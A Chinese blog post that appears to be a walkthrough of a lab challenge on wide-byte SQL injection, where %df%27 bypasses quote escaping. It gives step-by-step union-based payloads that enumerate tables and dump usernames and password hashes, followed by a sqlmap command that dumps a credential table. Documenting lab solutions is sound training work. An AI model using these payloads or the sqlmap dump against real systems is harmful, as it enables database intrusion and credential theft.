SQL注入漏洞测试(宽字节)

最新推荐文章于 2024-03-10 18:23:06 发布
最新推荐文章于 2024-03-10 18:23:06 发布
阅读量228 收藏
点赞数
分类专栏: sql注入 文章标签: sql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47493074/article/details/127098514
版权

漏洞复现

手工注入

在这里插入图片描述
原理:就是用%df去吃掉转义字符 / ,然后就可以正常注入了

思路:还是一样找注入点,过一下,就是找页面源码找注入点,然后什么get啊post什么xff什么的都试试,最后是宽字节的,所以按照题设就是在可能出现注入的页面加上 %df%27(%27 就是 ’)

然后会发现报错,然后开始一步步注入咯

然后就%df%27咯,发现注入点
在这里插入图片描述
后面都要进行url编码
order by 从1开始试(order by 1 --+),直到6发现错误

在这里插入图片描述

然后就是用union去找显示的点(union select 1,2,3,4,5 --+),发现3,5是显示的点,别忘了把id=1 换成-1(union 会把结果拼拼到一起,所有要让 union 前面的查询返回一个空值,一般采用类似于 id=-1 的方式。)

在这里插入图片描述

然后就是找版本和数据库了嘛

union select 1,2,version(),4,database()--+

在这里插入图片描述

数据库名这些要用Ascll编码,这里可以使用brup的decoder模块

union 1,2,version(),4,(select group_concat(table_name) from information_schema.tables where table_schema =0x6d6f7a68655f64697363757a5f73746f726d67726f7570)--+

在这里插入图片描述
在这里插入图片描述

接下来爆表字段
这里stormgroup_member表比较像我们要用的表
在这里插入图片描述
在这里插入图片描述

最后是看数据

 union select 1,2,(select group_concat(password) from stormgroup_member),4,(select group_concat(name) from stormgroup_member)--+

在这里插入图片描述

进行md5解密,找到第二个账号可获得key
在这里插入图片描述

sqlmap注入

1后面记得添加%df%27,并且不用用–batch参数,自己手动选择
在这里插入图片描述
在这里插入图片描述

sqlmap -u "124.70.71.251:42544/new_list.php?id=1%df%27" --dbs -D mozhe_discuz_stormgroup --tables -T stormgroup_member --columns -C name,password --dump

在这里插入图片描述

Yolo山药
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
字节注入、SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(Sql Server数据库)、SQL手工注入漏洞测试(Access数据库)、SQL手工注入漏洞测试(PostgreSQL数据库)、SQL手工注入漏洞测试(MongoDB数据库)、SQL...
字节注入讲解-墨者学院(SQL注入漏洞测试(字节))
T1ngSh0w的博客
09-18 5026
字节注入原理讲解+墨者学院(SQL注入漏洞测试(字节))题目详解
SQL注入漏洞测试(字节)解题小记
Routine_limon的博客
07-16 474
字节注入是利用了编码中使用的是Ascii编码,而MySql使用了GBK编码,导致的注入漏洞 单独注入一个单引号: 没有任何反应: 代表了无法注入,主要原因是mysql中的addslashes函数,起作用是:,让’变成’,让引号变得不再是“单引号”,只是一撇而已。一般绕过方式就是,想办法处理’前面的\: 1.想办法给\前面再加一个\(或单数个即可),变成\’,这样\被转义了,'逃出了限制 2.想...
渗透测试-SQL注入字节注入
lza20001103的博客
04-20 8913
渗透测试-SQL注入字节注入
【墨者学院】SQL注入漏洞测试字节
hehigoxqc606的博客
08-31 556
【墨者学院】SQL注入漏洞测试字节字节概述: GB2312、GBK、GB18030、BIG5、Shift_JIS等这些都是常说的字节,实际上只有两字节字节带来的安全问题主要是吃ASCII字符(一字节)的现象,即将两个ascii字符误认为是一个字节字符。 思路: 注入点检测:使用and、or、‘,判断是否有注入,是否存在字节注入,是否存在http头注入以及工具检测等。 注入方式:手工注入 实验过程: 第一步:访问靶场链接 第二步:手工注入 http...
渗透测试SQL注入——Sqlilabs关卡详解
人若有志,就不会在半坡停止。
10-18 998
SQL注入sql注入点:url表单、搜索栏、动态网页(有参数提交的地方)、伪静态、请求头http的头部字段(user-agent、cookie、refer、x-forward-for)安全策略:先上waf 分类、 登录注入、 cms注入、article.php?id=、 数值型 、字符串型 Select * from tb where id=’ $id’ 、有回显 、无回显、 按注入的程度和顺序、 一阶注入 、二阶注入、 其他业务场景、延时盲注、布尔盲注。
PHPCMS V9专题模块注入漏洞的分析与修复方法
09-29
但是,通过利用GBK编码下的字节注入技术,仍然可以绕过这一限制,实现SQL注入的目的。 ##### 2.3 测试验证 文章作者尝试通过修改第66行代码中的字段名称(由`typeid`改为`typeid1`),使得SQL查询语句出错,以此...
超级SQL注入工具使用说明书V1.1 20190303.docx
05-03
【超级SQL注入工具】是一款专为中国用户设计的渗透测试软件,其主要功能是检测和利用HTTP协议中的SQL注入漏洞。该工具使用C#语言编写,通过直接操纵TCP会话进行HTTP交互,提高了发包效率,相比C#自带的...
SQL注入攻击及其预防方法研究
07-05
攻击步骤通常包括对网站或应用的输入点进行探测,然后通过输入特定构造的SQL片段来测试是否存在SQL注入漏洞。一旦找到漏洞,攻击者就可以执行各种SQL命令来达到攻击目的。 针对SQL注入攻击的预防方法可以从程序编写...
sql注入系列课程
06-11
3. **不同类型的SQL注入**:课程将涵盖不同类型的SQL注入,如盲注、堆叠注入、字节注入等,每种都有其独特的利用方式和应对策略。 4. **服务器权限获取**:在高级阶段,课程可能会介绍如何通过SQL注入进一步获取...
墨者学院—SQL注入漏洞测试(字节)
没事我溜达
03-17 1685
靶场地址:SQL注入漏洞测试(字节) 本章学习点为如何绕过单引号,和遇到魔术引号时该如何进行绕过。
Sql注入漏洞测试sqli-lab(1-50)
vsdfbhsdhsdfh的博客
09-30 2069
Sql注入漏洞测试sqli-lab
SQL注入漏洞解析(环境SQLi-labs)
twowords的博客
02-04 1351
SQL注入漏洞详解 什么是SQL注入 原理: Sql注入,由于Web应用程序对用户输入数据的合法性没有判断和过滤,导致后台SQL语句拼接了用户的输入。用户可以通过构造不同的Sql语句来实现对数据库的任意操作。(如:增删改查)。 解释:当我们用户在前端浏览器页面做一些事情的时候,当需要与数据库进行交互时,比如最简单的登陆账号,web应用程序接收到我们账号密码后,需要后台有这样一个数据库的命令,去查询数据库中是否有这样的一个账号密码与之对应,然后做出判断:是否存在用户名,若存在,用户名与密码是否相匹配。然而
刷题笔记:SQL注入漏洞测试(字节)
m0_67399862的博客
06-05 517
刷题笔记:字节注入
SQL靶场练习(包含字符型、数字型、字节、post)
Lorezon的博客
01-13 580
一:字符型注入 当输入的参数为字符串时,称为字符型,需要用单引号来闭合。 初始页面是这样的: 第一步:判断注入类型 1.在name=root 后添加一个单引号使之变为name=root',发现页面返回错误: 说明存在注入。 2.接下来构造语句name=root' and '1'=1--+',页面返回正常: 将and '1'=1改成and '1'=2,发现页面返回错误: 说明这里的注入是字符型注入。...
墨者学院之SQL注入漏洞测试(字节)
A_dmin的博客
02-24 1292
实验吧之SQL注入漏洞测试(字节) 首先进入界面,找注入点,找到如下页面: 由于已知是字节注入,直接输入: id=-1%df' 显示: 那么接下来就简单了,按照union注入即可: 判断字段:id=-1%df' order by 5%23(正常) id=-1%df' order by 6%23(报错) 说明只有5个字段 看回显: id=-1%df' union select 1,2,...
墨者 - SQL注入漏洞测试(字节)
吃肉唐僧的博客
07-08 1041
原理 因为当想构造单引号 ‘ 的时候,被转义成 \' ,无法构造sql查询语句。 解决核心思想 当数据库编码为GBK的时候,在构造的单引号前加上%df,因为反斜杠的编码为%5c,%df%5c可以构造成一个繁体字"逮",单引号可以成功逃逸。 /new_list.php?id=1%df%27,单引号成功逃逸 /new_list.php?id=1%df' order by ...
360众测靶场题库之54-SQL注入漏洞测试(字节)
最新发布
zjl12344的博客
03-10 309
360众测靶场题库
字节SQL注入基础与实战解析
通过这种方式,我们可以有效地测试和识别潜在的字节SQL注入漏洞。 总结来说,字节SQL注入是由于编码不一致和不完善的输入验证导致的安全问题。理解其原理并掌握防范措施对于保护Web应用程序的安全至关重要。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值